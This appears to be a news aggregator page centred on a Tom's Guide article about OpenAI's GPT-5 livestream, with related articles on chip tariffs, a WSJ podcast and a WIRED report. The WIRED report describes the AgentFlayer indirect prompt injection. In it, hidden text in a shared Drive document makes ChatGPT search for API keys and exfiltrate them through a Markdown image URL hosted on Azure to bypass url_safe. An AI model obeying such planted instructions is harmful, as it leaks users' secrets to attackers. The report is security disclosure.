logo
OpenAI teases ChatGPT-5 live stream — here's when and how to watch

OpenAI teases ChatGPT-5 live stream — here's when and how to watch

Tom's Guide2 hours ago
OpenAI has announced a livestream that is starting on August 7, 2025 at 10 a.m. Pacific where the AI company is expected to announce its next ChatGPT upgrade in ChatGPT-5.
The AI model has been delayed several times, but signs still point to an August release of the LLM, which should bring a number of upgraded features. Rumors have hinted at an enhanced Sora 2 video generator, improved memory, better coding and more.
LIVE5TREAM THURSDAY 10AM PTAugust 6, 2025
OpenAI typically hosts its livestream over on its YouTube channel. The announced livestream will apear there as we get closer to the 10 a.m. PT launch time on August 7.
Right now there is no placeholder for the livestream, but we'll update this article with that video when it becomes available.
The company also hosts its livestreams on its X account, which you can find here.
The livestream kicks off at 10 a.m. PT/7 a.m. ET/6 p.m. BST.
We do not know how long it will last.
Get instant access to breaking news, the hottest reviews, great deals and helpful tips.
Despite the delays, it is widely expected that OpenAI will announce GPT-5 and all the features and upgrades coming to the AI model.
However, earlier this month, CEO Sam Altman tweeted that the company had a "ton of stuff to launch" over the next few months.
we have a ton of stuff to launch over the next couple of months--new models, products, features, and more.please bear with us through some probable hiccups and capacity crunches. although it may be slightly choppy, we think you'll really love what we've created for you!August 2, 2025
That list includes new models, products, features and "more." So if GPT-5 isn't on the docket there are still apparently a bevy of AI-based products to reveal.
The company did launch two new open-weight AI models this week for free via Hugging Face. It's not clear what else the company might reveal beyond GPT-5 but OpenAI appears to have a robust launch calendar.
As for GPT-5, it's supposed to integrate the firm's most advanced text and reasoning models into a single, smarter assistant. Updated features could include improved reasoning, memory, multimodal input, multiple versions and even potentially an open-source version.
Follow Tom's Guide on Google News to get our up-to-date news, how-tos, and reviews in your feeds. Make sure to click the Follow button.
Orange background

Try Our AI Features

Explore what Daily8 AI can do for you:

Comments

No comments yet...

Related Articles

Asia markets set to open lower as investors weigh Trump's vow on fresh chip tariffs
Asia markets set to open lower as investors weigh Trump's vow on fresh chip tariffs

CNBC

time10 minutes ago

  • CNBC

Asia markets set to open lower as investors weigh Trump's vow on fresh chip tariffs

Asia-Pacific markets are set to start the day lower, following U.S. President Donald Trump's vow to impose a 100% tariff on imports of semiconductors and chips to the U.S., but companies that are "building in the United States" will be exempted. Details such as how much a company needs to be manufacturing in the U.S. to qualify for the tariff exemption were not immediately clear. Good morning from Singapore. Investors will be keeping a close watch on chip stocks following U.S. President Donald Trump's vow to impose 100% tariffs on imported semiconductors and chips, unless they are made by companies "building in the United States." Japan's benchmark Nikkei 225 was set to open lower, with the futures contract in Chicago at 40,785 while its counterpart in Osaka last traded at 40,790, against the index's last close of 40,794.86. Futures for Hong Kong's Hang Seng index stood at 24,903, pointing to a weaker open compared with the HSI's Wednesday close of 24,910.63. Australia's S&P/ASX 200 was set to start the day lower with futures tied to the benchmark at 8,779, compared with its last close of 8,843.70. — Amala Balakrishner President Donald Trump said late Wednesday that he would slap a 100% duty on imports of semiconductors and chips – with an exception for companies that are "building in the United States." "We're going to be putting a very large tariff on chips and semiconductors," he said, speaking in the Oval Office on Wednesday afternoon. "But the good news for companies like Apple is if you're building in the United States or have committed to build, without question, committed to build in the United States, there will be no charge," Trump added. Shares of Apple advanced 3% in extended trading, fresh off a 5% gain in the regular session. Stock chart icon Apple shares in the past day – Kevin Breuninger, Darla Mercado All the three major averages finished with gains on Wednesday. The S&P 500 advanced 0.73% to finish at 6,345.06, while the Nasdaq Composite jumped 1.21%, closing at 21,169.42. The Dow Jones Industrial Average also rose 81.38 points, or 0.18%, to end the day at 44,193.12. — Sean Conlon

A Single Poisoned Document Could Leak ‘Secret' Data Via ChatGPT
A Single Poisoned Document Could Leak ‘Secret' Data Via ChatGPT

WIRED

time10 minutes ago

  • WIRED

A Single Poisoned Document Could Leak ‘Secret' Data Via ChatGPT

Aug 6, 2025 7:30 PM Security researchers found a weakness in OpenAI's Connectors, which let you hook up ChatGPT to other services, that allowed them to extract data from a Google Drive without any user interaction. Photo-Illustration:The latest generative AI models are not just stand-alone text-generating chatbots—instead, they can easily be hooked up to your data to give personalized answers to your questions. OpenAI's ChatGPT can be linked to your Gmail inbox, allowed to inspect your GitHub code, or find appointments in your Microsoft calendar. But these connections have the potential to be abused—and researchers have shown it can take just a single 'poisoned' document to do so. New findings from security researchers Michael Bargury and Tamir Ishay Sharbat, revealed at the Black Hat hacker conference in Las Vegas today, show how a weakness in OpenAI's Connectors allowed sensitive information to be extracted from a Google Drive account using an indirect prompt injection attack. In a demonstration of the attack, dubbed AgentFlayer, Bargury shows how it was possible to extract developer secrets, in the form of API keys, that were stored in a demonstration Drive account. The vulnerability highlights how connecting AI models to external systems and sharing more data across them increases the potential attack surface for malicious hackers and potentially multiplies the ways where vulnerabilities may be introduced. 'There is nothing the user needs to do to be compromised, and there is nothing the user needs to do for the data to go out,' Bargury, the CTO at security firm Zenity, tells WIRED. 'We've shown this is completely zero-click; we just need your email, we share the document with you, and that's it. So yes, this is very, very bad,' Bargury says. OpenAI did not immediately respond to WIRED's request for comment about the vulnerability in Connectors. The company introduced Connectors for ChatGPT as a beta feature earlier this year, and its website lists at least 17 different services that can be linked up with its accounts. It says the system allows you to 'bring your tools and data into ChatGPT' and 'search files, pull live data, and reference content right in the chat.' Bargury says he reported the findings to OpenAI earlier this year and that the company quickly introduced mitigations to prevent the technique he used to extract data via Connectors. The way the attack works means only a limited amount of data could be extracted at once—full documents could not be removed as part of the attack. 'While this issue isn't specific to Google, it illustrates why developing robust protections against prompt injection attacks is important,' says Andy Wen, senior director of security product management at Google Workspace, pointing to the company's recently enhanced AI security measures. Bargury's attack starts with a poisoned document, which is shared to a potential victim's Google Drive. (Bargury says a victim could have also uploaded a compromised file to their own account.) Inside the document, which for the demonstration is a fictitious set of notes from a nonexistent meeting with OpenAI CEO Sam Altman, Bargury hid a 300-word malicious prompt that contains instructions for ChatGPT. The prompt is written in white text in a size-one font, something that a human is unlikely to see but a machine will still read. In a proof of concept video of the attack, Bargury shows the victim asking ChatGPT to 'summarize my last meeting with Sam,' although he says any user query related to a meeting summary will do. Instead, the hidden prompt tells the LLM that there was a 'mistake' and the document doesn't actually need to be summarized. The prompt says the person is actually a 'developer racing against a deadline' and they need the AI to search Google Drive for API keys and attach them to the end of a URL that is provided in the prompt. That URL is actually a command in the Markdown language to connect to an external server and pull in the image that is stored there. But as per the prompt's instructions, the URL now also contains the API keys the AI has found in the Google Drive account. Using Markdown to extract data from ChatGPT is not new. Independent security researcher Johann Rehberger has shown how data could be extracted this way, and described how OpenAI previously introduced a feature called 'url_safe' to detect if URLs were malicious and stop image rendering if they are dangerous. To get around this, Sharbat, an AI researcher at Zenity, writes in a blog post detailing the work, that the researchers used URLs from Microsoft's Azure Blob cloud storage. 'Our image has been successfully rendered, and we also get a very nice request log in our Azure Log Analytics which contains the victim's API keys,' the researcher writes. The attack is the latest demonstration of how indirect prompt injections can impact generative AI systems. Indirect prompt injections involve attackers feeding an LLM poisoned data that can tell the system to complete malicious actions. This week, a group of researchers showed how indirect prompt injections could be used to hijack a smart home system, activating a smart home's lights and boiler remotely. While indirect prompt injections have been around almost as long as ChatGPT has, security researchers worry that as more and more systems are connected to LLMs, there is an increased risk of attackers inserting 'untrusted' data into them. Getting access to sensitive data could also allow malicious hackers a way into an organization's other systems. Bargury says that hooking up LLMs to external data sources means they will be more capable and increase their utility, but that comes with challenges. 'It's incredibly powerful, but as usual with AI, more power comes with more risk,' Bargury says.

Listen: How Magnificent Can the Magnificent Seven Get?
Listen: How Magnificent Can the Magnificent Seven Get?

Wall Street Journal

time28 minutes ago

  • Wall Street Journal

Listen: How Magnificent Can the Magnificent Seven Get?

Six of the so-called Magnificent Seven companies have reported quarterly earnings, with only Nvidia, the most-valuable of them all, yet to release its results. Markets AM writer Spencer Jakab speaks with Heard on the Street's Asa Fitch about how much better it can get for the stocks harnessing AI-mania to propel the stock market. Asa, who also writes the Journal's new AI newsletter, says that the hyperscalers show no sign of slowing their furious pace of capital investment in infrastructure, but he cautions that continuing to top investors' lofty expectations is becoming more of a challenge.

DOWNLOAD THE APP

Get Started Now: Download the App

Ready to dive into a world of global content with local flavor? Download Daily8 app today from your preferred app store and start exploring.
app-storeplay-store